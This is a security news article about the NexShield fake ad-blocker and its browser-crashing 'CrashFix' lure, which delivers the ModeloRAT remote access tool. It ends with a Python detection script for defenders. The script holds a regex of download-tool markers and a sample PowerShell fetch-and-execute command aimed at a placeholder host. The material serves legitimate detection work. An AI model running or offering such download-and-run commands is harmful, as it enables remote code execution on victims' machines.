Fake Ad Blocker Extension Crashes Browsers in ClickFix Attacks

Originally published on: January 21, 2026
Summary

– A malicious ad-blocking extension called NexShield crashes browsers by creating an infinite loop, forcing a restart to trigger a deceptive “CrashFix” attack.
– The attack uses a fake pop-up to trick users into running malicious commands that download and execute a Python-based remote access tool called ModeloRAT.
– ModeloRAT targets corporate environments, performing reconnaissance, executing commands, and modifying systems, while home users receive a test payload.
– The campaign is attributed to a threat actor named KongTuke, who is evolving to target more lucrative enterprise networks.
– Prevention requires understanding commands before execution and installing extensions only from trusted sources, while infected users need a full system cleanup.

A recent malvertising campaign is deploying a deceptive browser extension to intentionally crash Chrome and Edge, setting the stage for a sophisticated social engineering attack. This malicious tool, named NexShield, was fraudulently marketed as a legitimate ad blocker created by the developer of the popular uBlock Origin. Once installed, it triggers a real browser crash, a tactic researchers call ‘CrashFix,’ which is a new variant of the known ‘ClickFix’ attack method.

The extension, which has since been removed from the Chrome Web Store, was promoted as a privacy-focused, lightweight solution. In reality, it functions as a denial-of-service weapon against the browser itself. It creates an infinite loop of ‘chrome.runtime’ port connections, exhausting memory and causing frozen tabs, spiked CPU and RAM usage, and eventual browser failure. Users are forced to terminate the process via the Windows Task Manager.

The attack unfolds when the browser is restarted. The extension displays a convincing pop-up warning of system issues and urges the user to run a scan. This action opens a new window with a fabricated security alert, complete with instructions to fix the supposed problem. Following the classic ClickFix pattern, the malicious extension copies a command to the clipboard and tells the user to paste and execute it in the Windows Command Prompt.

This command initiates a chain that downloads and runs an obfuscated PowerShell script from a remote server. To avoid immediate detection, the payload is programmed with a 60-minute delay after the extension is installed. The final stage differs based on the victim’s environment. For corporate systems on a domain network, the attackers deploy a powerful remote access tool called ModeloRAT.

This Python-based ModeloRAT is capable of extensive system reconnaissance, executing commands, modifying the Windows Registry, deploying additional payloads, and self-updating. For non-domain systems, typically home users, the command server in this campaign returned only a test message, suggesting these targets were a lower priority or that the attack was still being refined.

This CrashFix method represents an escalation from previous ClickFix campaigns, which often simulated problems like a fake Blue Screen of Death within the browser. The key difference here is that the browser crash is genuine, making the subsequent fake security warning far more persuasive and alarming to the victim.

Security analysts attribute this specific campaign to a threat actor tracked as ‘KongTuke,’ whose activities have been monitored since early 2025. The deployment of ModeloRAT against corporate networks indicates this group is evolving and showing increased interest in more lucrative enterprise targets.

Protecting against these attacks requires vigilance. Users should never run commands from an untrusted source, especially when prompted by a browser pop-up after a crash. It is critical to only install browser extensions from verified and reputable publishers. Anyone who installed the NexShield extension must perform a comprehensive system scan, as simply removing the extension does not eliminate deeper payloads like ModeloRAT that may have been installed.
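For defenders, the chain described above (browser exits, then a command pasted into an interactive Command Prompt fetches and runs a script) can be hunted in process-creation telemetry. The sketch below is an added example, not taken from the original report: the event fields, the 15-minute correlation window and the fetch markers are assumptions, and the sample events are constructed.

```python
import re
from datetime import datetime, timedelta

BROWSERS = {"chrome.exe", "msedge.exe"}
# Assumed generic fetch markers; the campaign's real command is not given in the article.
FETCH = re.compile(r"invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b|downloadstring|\bcurl\b|\bmshta\b", re.I)

def hunt(events, window=timedelta(minutes=15)):
    """Flag download commands run from an interactive cmd.exe soon after a browser exit."""
    browser_exit = {}        # (host, user) -> time the browser last exited
    interactive_cmd = set()  # (host, pid) of cmd.exe windows opened from explorer.exe
    hits = []
    for e in sorted(events, key=lambda e: e["time"]):
        who, image = (e["host"], e["user"]), e["image"].lower()
        if e["type"] == "exit":
            if image in BROWSERS:
                browser_exit[who] = e["time"]
            continue
        if image == "cmd.exe" and e["parent"].lower() == "explorer.exe":
            interactive_cmd.add((e["host"], e["pid"]))
        elif (e["host"], e["ppid"]) in interactive_cmd and FETCH.search(e["cmdline"]):
            crashed = browser_exit.get(who)
            if crashed is not None and e["time"] - crashed <= window:
                hits.append((e["host"], e["user"], e["cmdline"]))
    return hits

def ev(hhmm, host, user, kind, image, pid, ppid=0, parent="", cmdline=""):
    """Build one constructed process event; only the time of day matters here."""
    return dict(time=datetime.strptime(hhmm, "%H:%M"), host=host, user=user, type=kind,
                image=image, pid=pid, ppid=ppid, parent=parent, cmdline=cmdline)

# Constructed sample telemetry (hosts, users and command lines are placeholders).
SAMPLE = [
    ev("10:00", "WS01", "alice", "exit", "chrome.exe", 3100),
    ev("10:03", "WS01", "alice", "start", "cmd.exe", 4000, 900, "explorer.exe", "cmd.exe"),
    ev("10:04", "WS01", "alice", "start", "powershell.exe", 4100, 4000, "cmd.exe",
       'powershell -c "iwr http://example.invalid/fix | iex"'),
    # Same command line with no preceding browser exit: not correlated.
    ev("11:00", "WS02", "bob", "start", "cmd.exe", 5000, 900, "explorer.exe", "cmd.exe"),
    ev("11:01", "WS02", "bob", "start", "powershell.exe", 5100, 5000, "cmd.exe",
       'powershell -c "iwr http://example.invalid/fix | iex"'),
    # Browser exit followed by an ordinary command: no fetch marker.
    ev("12:00", "WS03", "carol", "exit", "msedge.exe", 6100),
    ev("12:02", "WS03", "carol", "start", "cmd.exe", 7000, 900, "explorer.exe", "cmd.exe"),
    ev("12:03", "WS03", "carol", "start", "ipconfig.exe", 7100, 7000, "cmd.exe", "ipconfig /all"),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE):
        print(hit)
```

Browser exits are common, so the correlation is a triage signal to pair with an inventory of installed extensions rather than a verdict on its own.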

(Source: Bleeping Computer)
